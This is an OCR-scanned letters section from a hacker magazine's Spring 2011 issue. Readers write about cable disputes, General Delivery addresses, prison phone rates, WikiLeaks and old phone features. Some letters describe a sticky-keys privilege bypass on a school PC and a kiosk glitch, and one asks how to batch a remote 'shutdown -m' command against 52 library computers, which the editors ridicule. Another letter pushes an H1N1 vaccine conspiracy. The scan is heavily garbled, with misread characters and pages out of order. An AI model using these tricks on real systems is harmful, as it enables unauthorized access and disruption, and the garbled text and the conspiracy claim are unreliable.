operations. In New York, there was recently a "war "
between Cable vision and Fox - which you alluded UJ
- where lhe Fox network was taken off the Cablevi-
sion system due 10 a dispute over fees . Fox refused
to send the signal to Cablevision and its channels
were then replaced with Cablevision propaganda
announcements worthy of the Cold War. Fox , mean-
while. blacklisted lhe IPs of Cablevis ion subscribers
attempting to obtain Fox programming online. In
the end. after consumers wound up missing a good
pari ofthe World Series due 10this corporate spat , a
deal was struck , BUI, in afinal insult, the terms were
kepi secret from all ofthe people who were inconve-
nienced by all ofthis nonsense. Now. we 're tempted
10 just dismiss the entire thing as mere television
tha: shouldn't matter so much . But consider the
control that these corporate giants have over what
you can an4 can't see, how you access the lntemet,
and determining how much you pay, all the while
expecting you ro be sympathetic 10 the ir disputes
with other corporate giants, Add 10this the fact that
they also control newspapers. magazines, and entire
broadcasting networks, and their control can rival
that of the most oppressive governments in any parr
of the world. In the end, it should be the consumer
who decides what content lhey wish 10 have access
10and lhey ought 10 be able 10shop around for the
best price. Righi now, that is at best a fantasy.
Dear 26f)():
I just got my Winter 2010-2011 issue of 2600
(27:4) and read the article about General Deliv-
ery. I had written an article about this a long time
ago, bUI it's been lost in the vast Internet some-
where and I'd just like to add my experiences
with using this service.
FIrst of all, at the DMV there is no need to
provide a physical address if you're homeless.
Just write in "transient" on the residential ad-
dress portion. However, I have to warn you that
even though you put your mailing address as
General Delivery or wherever you want mail,
red light, speed, and toll roadcameras apparently
have access to your residential address and, if
you write in "transient," tickets from them will
be addressed to, in my experience, "N Physical
Address, City, State, ZIP" where city is that of
the mailing address. One time I had my PO box
clearly listed on both my driver license and regis-
tration, yet a toll notice came to the "N Physical
Address" which was entered as the physical in
the DMV's system. Besides that, however, I've
also had driver licenses with "General Delivery,
Guasti , CA 91743" and "General Delivery, Bev-
erly Hills, CA 90210." A picture of one such ID
card can be found on my Facebook (http://www.
facebook.comlrequestpassword - yes, this is my
actual URL) . I've also used General Delivery
for extensive periods of time for all of my mail
when I was living in Arkansas with no utilities
in my name, giving the physical address of the
post office when requested. Other tricks for when
Spring 2011
physical addresses are required include renting
a UPS Store mailbox. However, many of these
are " registered CMRA" addresses and will be
flagged in computer systems as a mail drop . If
you look through the phone book, however, and
use searchbug to verify the address, you can see
if there is a PMB designator that will give away
that it's a private mailbox. Some "mom and pop"
shops are not registered and you can use that as
physical.
Other alternatives, if you've ever been a vic-
tim of stalking (I have) , physical or sexual abuse,
or harassment include Address Confidentiality
Progrnms . Colorado, so far, has the best and I
moved here just because of their program. Check
out hnp :/Iacp.colorado.gov. They give me a phys-
ical address for mail, and I give them a UPS store
mailing address 10 re-send the mail to. They also
give you a laminated ID card that proves you're
in the program, and every state and local govern-
ment official must accept it in place of the actual
residential address, SOit works nicely . Banks also
must accept it under a AN/CEN ruling. For the
rest of the private entities that won 't accept it,
they gel the UPS mail drop address. When all of
your mail is going to one of these drops, the only
other thing you have to worry about are utilities
as there 's no way around not giving them a physi-
cal address. The good thing, though (in Colorado
at least), is that most utilities accept ACP and put
your utilities in a fake name while keeping your
real info in a secure department that only has it
stored in a folder somewhere in caseyou default
on the bill and they have to come after you for
nonpayment .
Lucky 225
Dear 2600:
As you know, an often-discussed topic in the
hacker community is the reason for hacking. As
past issues have discussed, sometimes hacking
can be useful and sometimes it can be like throw-
ing a brick in a window. Penetration testing, com-
puter learning, software modding, information
gathering, and other things can all be positive
aspects of hacking. [ recently came across a situ-
ation where a quick privilege escalation allowed
schoolchildren to use their Lego robotics soft -
ware despite restrictions placed by the district .
My dad is an elementary school teacher and
teaches Lego Mindstorrns robotics to his fifth
grade class . Recently, the district's IT admin-
istration made changes so that only they would
be able to do certain administrative tasks , I can
understand keeping students and inept teachers
from accidentally causing problems; the issue
here is the lack of IT support when necessary.
To use the Lego robotics , a certain piece of USB
hardware had to be installed, but now neither the
teachers nor the on-site computer lab instructor
had the permissions to install drivers. So my dad
----------Page35
asked me to come see if I could do something
about it. I figured it would be easy enough to
give my dad admin privileges on an XP machine,
and my assumption was correct. The most basic
methods had been disabled, but I was able to use
a well documented nick using BackTrack. I sim-
ply booted from my flash drive (which attracted
much student attention since I bad case modded
my drive by sticking it in a broken Pokemon Red
cartridge), and replaced "sticky keys" with a
command prompt at system level. Without even
logging in, I was able to cbange my dad's account
to an admin when earlier I would receive an "ac-
cess denied."
This is a very simple trick that isn't going to
impress anybody reading, but demonstrates the
merits of being able to take matters into one's
own hands wben the people in charge can't be
relied upon. I'm not saying that everyone in the
world sbould be a bobbyist hacker, but that some
basic script kiddie knowledge can come in handy
from time to time.
Evan K.
Dear 2600:
The wall mounted rotary phone in our home
is the most reliable phone our family has, even
though it does not ring. It is the only phone that
always dials out when we want it 10, and the only
phone that answers when someone else calls. The
two cordless phones we use sbould have skipped
us altogether and gone straight to the landfiU. The
cell phone is a waste of time because people tend
to text on it, and expect us to text back, again and
again, when it would be simpler just 10 confirm
plans with a five minute or less phone call. We
will not apologize that our fingers are not up 10
the same texting speed as our teenagers. The ro-
tary phone is crystal clear sounding, except for
the person on the other end who is calling from
a cell. There is something very fun about turn-
ing the dial, listening 10 the clicks, and of hav-
ing 10 stay in one place because the cord won't
stretch past the kitchen. About having a piece of
equipment housed in durable, thick, stylish black
plastic, hanging on the wall. About talking with a
speaker and microphone that actually have some
clarity to them, even if it is only 10 shout at the
computerized voice of a collection agency calling
the house for someone who doesn't live here, that
is satisfying in a way that a cell phone will never
be for us.
Anachronistically yours,
Justin & Audrey
Cincinnati, Ohio
The fact remains that a good land line sounds
infinitely better than any ceil phone . (Obviously, the
fact that it's a rotary phone has no bearing on this.)
We await the day when a cell phone company takes
it upon itself to use some more bandwidth and dra-
matically improve the sound ofthe audio: Withall of
Page 36-----------
the things "smart phones" can tUJ today. it's incred-
ible that making a simple phone call sound as good
as it would have 30 years ago is beyond their reach,
Letters from Prison
Dear 2600:
Keep up the excellent work with your publi-
cation! I eagerly anticipate its arrival every quar-
ter. There is not one part of ill dislike. One of my
favorite things is when articles are facilitated us-
ing tools in Linux. Being a Linux user often feels
like a special kinship with immense benefits, all
for free!
I am currently incarcerated for some dumb
decisions. However, I was able 10 secure a very
fulfilling job with the Prison News Magazine. I
just wanted 10 leI you know that I have utilized
this position 10 reach 1300 inmates with the
Linuxgospel.
I thank you for belping to keep my techno-
logical spark alive during my stay.
Peter
Thanks for forwarding this along to us. Both
the article and the publication impressed everyone
here. It's truiy inspirational to rake what could be
the worst part of your life and use it to help your-
selfand others learn andgrow. This is something we
could a// benefit from . We've left out any idennfying
information as we weren't sure you wanted to give
thai out , and in sud cases we always err on the side
of caution. We'd be happy to spread information on
this and other positive prison projects .
Dear 2600:
I've done 19 months in the bucket and still
have no sentencing date, and I was forced for
the second time to submit to a psych eval in
which I was given jet fuel/diesel therapy, tlying
and driving allover the West, only to come out
100 percent competent each time. Last attorney
bailed out on me a month before my September
16th sentencing date "under seal" and the warden
is retaliating against my First AmendmentlUDHR
Article 19rights by denying media direct access
to me. Oh well, that's life.
I hope the EFF are planning to try to repeal
this FCC regulation of the net. That's simply the
foundation to supply power to an ever-growing
Orwellian Big Brother, and once freedom of
speech is censored and regulated, we can kiss our
human rights and freedoms goodbye.
Anyways, enclosed are the patents for the
HI N1 "swine flu" vaccine, which clearly is
evidence that the U.S. government infected and
killed innocent people worldwide, then lied about
it, and are still pushing their vaccine primarily
on our youth and children. I think there were 47
million Americans who were sick from it and the
COC estimated last year that 60 million people
were vaccinated in the U.S. And. because of the
HINI, there were fivetimes more deaths in young
2600 Magazine
adults and children than during a regular flu sea-
son. Not 10 mention that if each vaccine shot costs
the consumer $15, multiply that by 60 million
and you've got epic profit. The highlight of the
vaccine patent is the filing date of 8/2812007 and
publishing date of 3/512009. Apparently the USP·
TO removed or renamed the application number
(60/966724) because this document was found
and people started preaching about it. This docu-
ment is a public document , so it was not obtained
in any ill-faith, bUI someone doesn't want people
to know the truth . I wonder what Julian Assange
would do in a situation like this. WWJAD? The
whole point of WikiLea.k.s is accountability for a
govemment that lies and deceives.
He who controls technology (and data) con-
trols the wot»<!. We have finally weaponized data.
We theoretically hold the spear of destiny, but
somebody has 10 show these bastards how to use
it . and not for selfish gain, but for the freedom
that we're supposed 10 have, the sovereignty that
was rightfully given 10 us and secured to us by lhe
Declaration of Independence, the United States
Constitution, and the Universal Declaration of
Human Rights, Our kids will become slaves psy-
chologically andlor economically if we don't pro-
tect our country, With great power comes great
responsibility. Weaponize knowledge,
Ghost Exodus
As always, it's good to ask questions and never
believe blindly what you 're being told. The centro-
versy here apparently lies in the belief that the VlU-
cine patent for the H1NJ virus was filed two years
before the first HINI case was reponed. We're not
going to get into a whole back and forth here, ex-
cept to my that evidence is rarely this simple and
clearcut , When investigating anything of this na-
ture, you 'll learn far more if you haven't reached
your conclusions before doing the research. Far too
many people fail into this trap and they wind up dis -
regarding any inconvenient facts that don't support
their theories, Incredible and shocking things can
be discovered if everything is questioned through
investigations and leaked documents . But if ques-
tioning the questioners is discouraged, the truth will
remain hidden,
Dear 2600:
I am an inmate in Kansas. I wrote a month
and a half ago while I was in another prison. I gOI
my hands on a few zines that a guy Joe ordered.
I asked your crew if you had any extras that you
could send my way due to my lack of funds at
the moment,
Youprobably don't really know what you did
when you practiced a form of open-handedness
as you did. I have been down since I was 18. I
get out in ten months. I will be 25. This amount
of lime would lead one 10 believe I did something
extremely violent. I got three nonperson felonies
that ran back to back. That's what happens when
you keep your mouth sbut and follow lhe code. I
Spring 2011
am rambling. LeI me back up.
I am now on 24-hour lockdown. As I was say-
ing before when I was handed six issues of 2600
mag, I could not believe it. In all these years, I
forgot bow 10 really feel anything but hale for
others.
Before I got locked up, this was my area of
interest. I pursued the ability to seek truth at any
junction. On top of gening your mag, il was actu-
ally forwarded froma prison I was in before here.
The 2600 crew did a stand-up thing.
I want 10 thank you for being exactly what
you stand for. I would like to contribute in the
next year or so. While I know you don't expect
to profit off of your kind act, you certainly will.
HOPE 2012.
W
While we're not always able to help people in
this way, we do try . The support we get from our
readers and subscribers helps to make thai possible .
AU we ask in return is that you keep from getting
sent back in and that you do whatever you can to
keep others from being pulled into our awful pris-
on system. The authorities simply love recidivism.
While you may have been absent from the hacker
community for a while, you should have no trouble
learning about any new developments. As we all
know, there is so much to learn and explore in the
hacker and phone phreak world that doesn 'I have to
involve confrontations wilh the law.
0ear26OO:
I am now being detained in an institution (an
injustice that I would go on about if anyone is
interested) and would like to get 2600 sent to me.
lt is not currently on the banned books list, but it
has also never been reviewed either. It has been
my observation that no matter how harmless and
benign a publication is, if enough attention is
brought to it, someone will find a reason to ban
it. So would you send me a 2600 and, if it gets
through, I will have expectations that it will con-
tinue to make it and I will get you the subscrip-
tion money before I will expect the next one, if
you wish?
My next inquiry is to the community. My
problem is that the rates for phone calls through
the monopoly phone company are so expensive
thar money is most likely a contributing cause for
my continued unlawful detainment. The name of
the phone company is Global TelLink - www.gtI.
net. The pbone number for "help" is 800·231 ·
0193, for debit/prepay it's 877-372-4330. Inter-
nally, I dial for complaint *1995, to alter my al-
low list #44. For me to make a call, I mUSI enter
an ID number and PIN, then add the number that
I want to call 10 the allow list. It is then verifiedby
automated dialer, asking if I can call. Then, once
allowed, I call and you get the option to press 9
for rate info, press 0 to accept , press 7 to block ln-
mate calls. If I am paying by debit, 9 is not avail-
Page 37
Top Sec
cbapo
www.seek-trulb.net
-------------------Page39
able. The cost for me by debit is $5 per 15 minute
call. just less than $10 for collect .
The first fix that came to my mind was to
get some local phone numbers ($.91 connection
fee) and forward them to the handful of people I
would like to call . Keep in mind that my access
to information is tightly controlled, so my abiliry
to check in to alternatives or specifics is limited.
That is where I need help most. So any alterna-
tives and specifics would help a lot.
Mark
We know a lot of people are working on ways
to make it easier for people in prison to beable to
make affordable calls. The overpriced and manopo-
listie systems currently in place at so many facilities
are basically criminal enterprises. We support any ·
thing thai brings their dominance to an end. As it
develops, we 'll continue to track this story.
Addendum
Dear 26()():
Thask you for accepting my submission! I've
been a reader for ~ last 17 years and feel hon-
ored to have my work published in your map-
zine ,
J have reviewed the article I sent you ("How
to Cheat at Foursquare," 27:4, page 9) and there
is (JOe small change: Step 6 says 10 look for the
line •<toolbaritem id=«fsxlogin">' . That should
be changed to '<toolbariLem id="fsfxlogin">· .
aberippa
Feedback
Dear 26()():
I just finished reading 27:3 and very much en-
joyed the article "How to Tum Local Admin into
Domain Admin" by David Dunn. The article re-
minded me of a common practice in the Windows
community of granting users admin privileges so
they can install programs and manage their own
computers. This practice is as dangerous as al-
ways logging onto a UNIXlLinux system as root.
Wmdows has a "Run as .." option that acts mucb
like sudo, with the exception that you must au-
thenticate with an a.dmin account. The company I
work for has started issuing admin users two ac-
counts, one for logging onto machines and one
for running processes that require elevated pri vi-
leges . While this can be an inconvenience, it docs
limit the effecti veness of exploits like the one
detailed in David's article.
Adam
Dear 2600:
This is in response to Citizen warrior 's letter
in 27:3, page 37. Thanks for your inquiry con-
cerning UMy Second Implant" arti cle in 27:2. It is
wonderful to hear of your interest in near -future
advances in electro-biological coupled devices . [
Page38
am looking forward 10 a day when implants such
as those described in the story become a realiry.
&tragon
Dear 2600:
On the cover of 27:4, the Yellow Pages listing
for "Dead Loop" points to 45 .645 - 122.53[ 3. A
giant grin crept across my face when I read that .
Boy, do those coordinates ever sound familiar!
Please continue to be my muse .
MotoFox
Dear 26()():
Dudes! The new issue is like, totally awe -
some! Seriously, though. Really, really great is-
sue .
[ also want to say that I was (and still am)
quire impressed after reading the Helen Keller
quote at the top of page 65 . Words to live by, I
say. Nice job putting that in there. Inspiring, to
say the least!
Gordy
And yet, we feel like we could have done more,
Dear 2600:
I just have a couple of things 10 share about
27:4.
First : "How to Find Information on PCQp[e
Using the Internet" by DarX • great article and
weU put together. ( would also like to pass along
a site that should be added to the list: www.pipl.
COm. This site is kind of an all-in-one site that
will gather irtformation from criminal/courtJpub-
lie records to social oetwork sites on a particular
person. You can searcb by name and state, email ,
user name, or phone number and they also have a
bus iness search.
Some words for Salih who wrote a letter ask-
ing advice about how/where he should start in his
hacking career. Salih, first I would have to say
that the response to your letter is accurate. Sec -
ond. I would highly suggest not trying to make
hacking so much a career. Honestly, (was headed
down the same road (CEH certified, along with
an alphabet soup of certs) and , you know, back -
ing was not fun any more . Actually. technology
as a whole was no longer fun. It fell more like a
job, and my love for technology was slowly near-
ing its death. I was fighting again st others instead
of learning from others, and that is not what the
communiry of hackers is supposed to be about.
Lastly, I wanted to leave something small for
the community that I discovered while at a local
Lowes store. I was picking out some paint one
day and took notice of the paint kiosk. You could
use this kiosk to design rooms and paint them so
you could have a glance of what the paint would
look like on your walls , etc. While these kiosk
have no keyboards, they do have a mouse. While
using the mouse and clicking the left and right
mouse buttons rapidly on the screen, the paint
program will start to glitch. as it is being reset
with every click of the mouse, and sooner or later
2600 Magazine
~ o u will come to a black screen with some in-
formation about the machine this program is on.
What you can gather is host name, host lP, store
number, date/time. and software vers ion.
Many thanks go out to the community that
keeps this magazine alive. God bless .
Dear 2600:
I for one would be interested in seeing an arti -
cle on David's Minto Wheel project (letters 27:4),
or other DIY type mechanical hacks - important
not to forget our technological roots and all. For
all we know, we may see the day when we need to
generate our own power, and all my info on that
kind of stuff will be quite useless in its current
ebook form.•
Also FYI, the Borders in Santa Fe, New Mex-
ico has been charging me for "periodical" without
being able to scan the barcode for the past few
years.
Zacb
Perhaps Borders gives credit for whatever issues
are no longer there when the sales period ends. We
know thai Barnes and Noble penalizes publi shers
f or any missing issues. even when the problem is to-
tally on their end . We don 't know how it could ever
be a publisher s fault when an issue is unaccounted
for inside a store, but that is haw this cra:;:y industry
is structured.
Dear 2600:
Thank you for all of your hard work through-
out the years . 2(j()() is by far a favorite of mine!
I just wanted you to be aware of an "i ssue"
with my issue: 27:3 (Winter 2010). I would imag-
ine I may not be the only one, but I received my
subscri ption as normal in the mail and it was as if
your publisher/printer burned their printing plate
too large or maybe the layout was sent to them
too large. What I mean is the outer margin is non-
existent and one word is cut off on every line . It is
not an offset problem, because the margin is nOI
extra large on corresponding pages .
Otherwise, keep up the great mag!
Pete
These kinds of things do happen on occasion in
the printing world. When they do, its always helpful
to get as much specific info as possible. Ifsending us
the actual issue isn't possible. a description of what
exact page the problem occurs on (digital pictures
via email would behelpful, too) will suffice . In this
case , the issue number you give doesn't match the
date . The winter issue would have been 27:4. not
27:3. Naturally, we will replace any defective issues
received.
Queries
Dear 2600:
I'd like to post an article in the 2(j()() to get
some help on the side 10
Spring 2011
Thai must have been the moment when they
caught up to him.
Dear 26()():
I've been reading your publication for years
despite having no physical knowledge of the
computer applications. I read 2600 for the ideas
and the dead -on responses to your readers. Even
if I'm not a computer junkie (I am an informa-
tion junkie) , I've just taken the print route up until
now. I wouldn't call myself a Luddite, but I'm
32 and just got a computer a few months ago . I
live in Maine, so it took a little longer for it to be
difficult to live without one. So anyway, we had
a snowstorm today and I was pretty excited to be
able to go online and get the cancellations info
instead of waking up at six to catch the special
snowstorm report . I walked away for a minute,
and when I came back Microsoft Word popped up
at the bonom and I clicked on it because I didn't
open it and there was a box that looked like files
were being transferred. I shut down my computer.
Whal does this mean ? Where can Tbegin to pre-
vent security risks with little 10 no money?
Maggie
"S not thai easy without SOrTU! 17Wre specific in·
formation to figure out exactly what was happening.
In 17Wst cases, you can go online and plug in quotes
of various system messages you see to hear other
people 's experiences and learn from those. You can
avoid 17WSt of the heartache by not downloading
programs or files without knowing the source. Mak.e
sure any browser you 're using is updated and able
to alert you to any potentially malicious pages thai
could plant things on your system. None of this has
to be difficult and usually those who try and make
you believe thai hav e something to gain by making it
all mysterious and inaccess ible. Keep backups and
don 't be afraid 10 experiment and make mistakes.
This is what it's all about,
Dear 26()():
When I renewed my membership to WBAI. I
tried to tell the operator what my favorite shows
were. They told me there was no way then to re-
cord such votes . Something or someone told me
that an opportunity to vote for shows would start
about now. (It's in my calendar.) But WBAI.org
has no obvious link to any such option. Is there
any accounted-for way to tell WBAI that Of/The
Hook is among my reasons for subscribing?
Chris
If you make a pledge to WBAI online. you can
vote for your favorite show at thai point. Simple
select "Donate to Favorite Show " under the "Sup-
port WBAT" tab. If you phone in your pledge, it's
assumed that the show thai's on the air at that point
is the one you 're supporting. We encourage people
to support the station whether you love or hale our
show, as its the f orum tha: make s so I7WCh in the
way of communication and exchange of ideas pos -
sible.
my head yesterday) and I recall it from my youth.
Known as "Repeat Call" in the Philadelphia
and tri-state area, the *66 feature was introduced
back when we didn't all have call waiting or
direct-to-voicemail rollover. If Alice called Bob,
but found his phone line busy, she could opt to
hammer Bob's number, but without much effort
on her end. Allowing Alice's phone to remain
on-hook, Repeat Call would have the local CO
(I assume?) keep making dialing attempts on
Bob's line (or just have it check the status of
Bob's line?), and then ring back Alice if the situ-
ation was resolved. I do not recall 100 percent,
but would Alice's phone alert with a distinctive
ring, then she would hear dialing on the other end
when she picked up?
My question is: how much of this am I re-
membering correctly, and how much do some of
the old-timers and phone veterans at 2600 know
of this feature? What was actually happening on
the CO end? Could this feature work between re-
gions? Abit of quick Googling shows me that the
*66 function appears to still be available in some
modem systems and current service areas (or at
least it's still in the documentation).
I'd love to know more about this piece of my
memory, which (according to those amusing TV
commercials) absolved the troubles of so many
afflicted people expressing ire and frustration at
their home phones as that sing-song jingle rang
out over and over again... "repeat call, repeat call-
al-al."
Deviant OUam
This feature does still exist for those rare in-
stances where you actually encounter a busy signal.
Back in the days when not everyone hadcall waiting,
the Repeat Dialing function (as it was called in Bell
Atlantic areas) was a bit more useful, albeit a rip-off
even then. It was initially only available in your own
local area and gradually expanded outwards so that
you could use it nationwide. Your phone would in-
deed ring distinctively to let you know that *66 was
calling you back. You'd then pick up the phone and
hear ringing (no dialing), unless the other person
hadgotten back on the phone in that brieftime peri-
od, in which case you'd hear a recording telling you
that the line had "become busy again" and that you
had to start the process over by dialing *66 again.
Oh yes, and you were still chargedfor the failed at-
tempt. An interesting sidenote: to this day, people
in our area who encounter a busy signal will hear
a recording come on the line that says: "The line is
busy. But you can have Bell Atlantic keep trying and
call you back when the line becomes available for
75cents by dialing 3. No charge for Repeat Dialing
subscribers." Bell Atlantic hasn't existed since 2000
and apparently Verizon hasn't gotten around to up-
dating their recordings in all that time.
Dear 2600:
Transcend has a series of snow goggles with
an onboard Android OS to provide a heads-up
---------------------Page41
mand prompt. All of them except the whopping
52 computers in the library. Now, over the past
two months I have been steadily writing down
all of the IP addresses of the computers. I now
have amassed all of the computers including the
administrator computer IPs (I knew one of the
workers). I plan on simply pulling up a command
prompt and typing "Shutdown -m \\IP address
-s". I might add some text, but the point is I do
not want to have to write that for 52 different
IPs. That would be time consuming and allow for
me to be caught. Is there any way I could write a
batch file for all of that? If so, how? Thank you
very much for your time!
NABster
This is really the best prank you can come up
with? This i! about as clever as yanking out a power
cord. Learning how to bypass the security would be
clever. Even figuring out how to write a batch file
would be an accomplishment. Using this knowledge
just to screw people over by shutting down machines
they're using is only going to reinforce the negative
stereotype of hacking, not that this is anything re-
motely similar to hacking in the first place.
Dear 2600:
Thank you for such an amazing magazine.
I have purchased every issue since I leamed of
it three years ago. Years ago, during my IT in-
ternship, I heard that I cannot do certain things
(such as subscribe to this magazine or buy any-
thing hacker-related with a credit card) otherwise
I would get "blacklisted" and if I got blacklisted,
I could never hack because the FBI would be
watching out for me. If something suspicious hap-
pens in my area, I would be the first person to be
checked out. My first question is: what is "black-
listed?" How does it work? And how would I get
rid of it? If I moved, would it follow me? Do you
ever lose it? Thank you so very much! Love the
magazine! Bought every book (in cash)!
An Inquisitive Youth
Wow. How do people manage to believe in such
things? You actually think that if you bought a copy
of our magazine with a credit card, the FBI would
start watching you? If that were only true, we could
wind up making that agency extremely busy. Sure, if
you're up to all sorts ofsuspicious activity, you very
well might have people in law enforcement monitor-
ing your activities. But you would also very likely
get caught at it. Simply buying something on your
credit card, unless it's stolen nuclear materials, is
not going to get you on any sort of a list. By acting
as if such things are true, you help to make such a
world a reality to you and others who might believe
such things. There are many threats out there and its
up to us to learn what's real and what's not.
Dear 2600:
I haven't had a land line telephone for over
a decade now, but recently an old POTS feature
popped into my mind (because the incessantly
catchy commercial jingle for it popped back into
Spring 2011
buying the more expensive one. Please give some
insight on the pricing.
Graham
We have nothing to do with the pricing for the
two books that were published by Wiley. We are,
however, involved in pricingfor the Volume 26 com-
pilation and the individual electronic issues and
subscription. What we know is that Amazon makes
it a condition that the price on the Kindle be the
lowest available. If a publisher fails to do this, they
lose halfoftheir payment. This also gets tricky ifthe
publisher isn't able to actually set the price them-
selves. For instance, Amazon set the price for our
electronic subscription as well as the individual is-
sue. Ifa competitor oftheirs set the price lower than
Amazon S, we would be screwed. So we're forced to
only let competitors sell it for a higher price, even if
that price is a penny more. Ifa competitor also won't
let us set the price, we face a real problem. We're
still learning how it all works and we'll continue to
let our readers in on it as things play out.
Dear 2600:
I am 17 and I have been a reader of this pub-
lication for three years now. I have loved every
single issue! They have helped to advance my
knowledge of the tech world immensely! But I
would like your help if possible. I was recently
laid off of my IT network administrator job re-
cently due to Michigan's horrible economy and
have had time to reflect on my tech skills. I real-
ized I know nothing related to hacking. I am not
asking because I am a little kid trying to find out
how to make his neighbor's computer melt (not
that that wouldn't be fun) but because I would
have been more valuable at my last job if I had
known how to break into our network that I set up
because then I would have known how to make it
more secure. In short, I would like to know where
to start. I've been listing to Off The Hook pod-
casts and such but I need to learn the basics to
hacking.
Caboose
The only way to learn is to listen to the ques-
tions you have within you and explore as much as
possible to find the answers. You can learn all sorts
of security tips for specific operating systems and
setups but that S not really what hacking is all about.
That's more about how toface offagainst the hacker
mentality. Ifyou're truly interested in being a part of
the hacker worldyourself, then prepare to do a lot of
exploration, reading, and experimentation with no
foreseeable payoff, other than satisfying your own
curiosity. If that seems like a waste of time, then its
not the worldfor you.
Dear 2600:
I love your publication! It is excellent! I
would like to ask you a question. Last semester,
my friends and I cooked up a prank to pull on the
community college that we attend. All the com-
puters that the public can access have annoying
administrator rights blocking us from the com-
2600 Magazine
Dear 2600:
I recently returned home from a Christmas
road trip to New York and on the ride back we
decided to take photos of what few payphones we
could find along the way. I'd like to submit them,
but printing them out and getting stamps to mail
them, etc. seems like a lot of work. Are you guys
still adamant about mailing in physical photos as
the site suggests? Or will email submissions be
acceptable in this digital era in which we live? If
so, what format do you prefer? Also, what infor-
mation should be included with the photos (i.e.,
location)?
p-Io
We absolutely accept digital photos if they're
clear and detailed enough. This usually means send-
ing us rather large files which we're quite capable
ofhandling. Please include as much info as possible
about the phone you're submitting. We sometimes
get great pictures of payphones where vital infor-
mation such as where it was seen is left out. We re-
ally would like to have more information than this,
though, such as whether or not this type ofa phone is
seen frequently, what its capabilities are, what land-
marks it may be near, something about the phone
company that runs it, etc. The email address to send
payphone photos to is payphones@26OO.com.
Dear 2600:
Keepin' it short. When was the first issue pub-
lished? What is the 2600 birthday? I mean, January
8th is the Manifesto's 25th, and as I was finishing
my party stuff, I was like, you know, I have no idea
when 2600 started. I am three months younger than
the Manifesto. Honestly, as I re reread it tonight,
I realized the words he wrote are immortal. Loyd
Blankenship's words are as inspiring to me now as
they were whenI first read themin 1998whenI was
13. They are the reason I became a computer en-
gineer, the reason I reverse engineer and improve
technology. Where would we be without those
words?His wordswerethe bits of steak: that inspired
us to continue to say fuck you to Ms. Smith.
Back to the point. When is 2600s birthday?
Andrew
Tag Not Required
we are anonymous
Is this a Ms. Smith we know? And you actual-
ly had a party to celebrate the anniversary? Your
passion is contagious. The Hacker Manifesto was
indeed released on January 8,1986 and served as
words ofinspiration to an entire generation ofhack-
ers. As for when we started, we can tell you it was
January of1984 but we'd have tofind someone who
saved their first envelope to see what the exact date
ofthe mailing was. We would not be at all surprised
if someone actually did that.
Dear 2600:
I'm curious about the pricing of the Kindle
and Nook versions of The Best of2600. The Kin-
dle is $19 while the Nook is $31, leaving me with
the ethical question of buying the Kindle version
and cracking the DRM for use on the Nook or
Page 40
Maybeso
We're not big fans of the idea , sorry. For one
thing, the hacker community should never be in ser-
vice 10 any government agency, as it runs counter
to all of our individualistic leanings . We are not
soldiers or some kind of military resource to be ex-
ploited at will . The idea of getting a free pass to do
God knows what in exchange for this type of service
is wrong for a number of reasons . For starters, you
would be quite foolish to assume you 'd be safe in
such a situation. More importantly, we should nol
be thinking of our activities as the types of things
tha: are criminal in nature. Open source software,
free communications, shared content , "f orbidden"
knowledge ... these are oil concepts that many in the
mainstream view with hostility and suspicion, and
for which some kind of penalty would not be out of
the question. Bur by fighting for the right 10 embrace
these ideas , we not only keep ourselves from being
labeled as crimi nals, but we change the mainstream
perception so that others throughout the world and
in the future will also benefit from a more enlight-
ened approach.
8uI if's especial ly nonsensical to believe whatev-
er you 're told about one man being some sort of suo
pernatural threat against ali that is right and good
in the world. This isn'tsome James Bond movie and
Julian Assonge isn't Goldfinger. He happens to rep-
resent a whole lot of people and his work would be
carried on with even more energy by others if he
was taken out ofservice. The reason so many people
support this is what you should be looking at and
using 10 question your own beliefs. You may wind
up comi ng to the same conclusion, but at least you'd
realize that this isn 't about one person , nor is it a
simple good versus evil battle that's being fought ,
Rather; it's about completely different opinions on
how to deal with "classified" material, opinions that
have finally come into the forefront , due /0 technol-
ogy and the actions of a few keypeople. The world
has changed as a result and we 'd best all figure out
how 10 live there.
Dear 2600:
Shit - oops - never mind bout my last email
- I'm drunk.
Maybeso
At least you've got an excus e.
Dear 2600:
I sincerely hope that Julian Assange is on the
cover of your next issue .
Lucas
As you con see , your wish has come true (except
in those parts of the world where we were forced
by authorities to make a change and pUI something
totally different on lite cover).
Dear 2600:
Given the media circus around the most re-
cent releases from WtkiLeaks and the arrest of
Julian Assange, I'm sure you're getting many let-
ters about the topic, and most are in Assange's
favor. (I noted that the 2600 site is even bosting a
mirror of the Wikil.eaks site currently.) However,
1, for one, have some serious reservations about
-------------------Page43
Spring 2011
On WikiLeaks
Dear 2600:
I just read an article about Interpol looking for
Jul ian Assange (the WtkiLeaks creator). I thought
it may be an interesting idea to track him down
and help DC and Interpol out with getting him.
Here's the way I think about it. This guy is and
has been a threat, a big threat at that. If it goes
down successful, it's earning brownie points with
DC and Interpol , and wben you help people that
are way up in the chain, it 's more than likely all
the other agencies down below them begin to cut
you some slack in the future and/or use this as a
good dealing chip in your favor. Here's the way I
think. about good and bad stuff in life. You could
have done a lot of wrongs in life and the one right
takes away all the wrongs you have done. Some-
times it works the opposite way- 101. It's just an
idea. If you like the idea, please let me know.
Thanks.
long time for using "sweatshops." In the fashion
world, people boycott sweatshops by wearing
clothing only manufactured in tbe USA. Same
with cars. Is it possible to boycott certain com-
panies that use questionable labor by not buying
computers from them? I hope this raises some in-
teresting issues for our letters section.
Another question for The Prophet, or anyone
for that matter, about technology. I've heard of
vending machines that you can order from using
SMS, Bluetooth refrigerators, and everything in
between, mostly in the pages of 2600. Can you
write about these kinds of interesting uses of
technology? I would like to hear more about how
SMS is used in vending machines. I wonder if, in
the near future, I may be able to text my micro-
wave at home and tell it to heat up my dinner in
15 minutes.
2600, I hope you eventually move 10 a month-
ly magazine. Prophet, great writing. I smell a
book . You should consider writing one. To fellow
readers , let's have a discussion!
Jeffrey LaChord
The Prophet responds: "I don ~ have any fir st -
hand experience with factory labor conditions in
ChiTU1, although I doubt any job is worse than being
an outside plant technician during a lightning storm
in America. Telecommunications plans is a tough
job , no matter where in the world or where in the
supply chain you are." On the other question: "Mo·
bile payments are an exciting and growing area.
In China and Europe , there is even SMS banking.
There is a major convergence happening between
RFID, smart phones, SMS and mobile data, and
a lot of confusion in the market, Look for more on
this topic when the dust settles , In 'The Telecom In-
former,' I try to address contemporary topics while
keeping them relevant for many years."
arrive to me with the envelope ftap only lightly
sealed, or completely unsealed (but still sticky) .
Sometimes the envelope flap is taped closed.
How do you normally seal the envelopes for in-
ternational mailing?
pseudored
We will check with the folks who handle the in-
